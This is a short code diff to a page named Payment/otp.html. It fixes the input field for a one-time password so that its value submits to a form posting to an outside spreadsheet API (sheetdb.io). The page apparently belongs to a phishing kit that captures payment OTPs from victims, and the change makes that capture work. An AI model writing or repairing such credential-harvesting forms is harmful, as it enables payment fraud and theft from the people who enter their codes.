--- a/Payment/otp.html
+++ b/Payment/otp.html
@@ -122,7 +122,8 @@
 <form action="https://sheetdb.io/api/v1/zbeawa6pp8jmn" method="post" id="sheetdb-form" >
     <div class="form-group">
       <label for="otp">Enter One Time Password*</label>
-      <input type="number" id="otp" name="otp" name="data[OTP]" autofocus="autofocus" required />
+      <input type="number" id="otp" name="data[OTP]" autofocus="autofocus" required />
+
     </div>
 
     <div class="buttons">
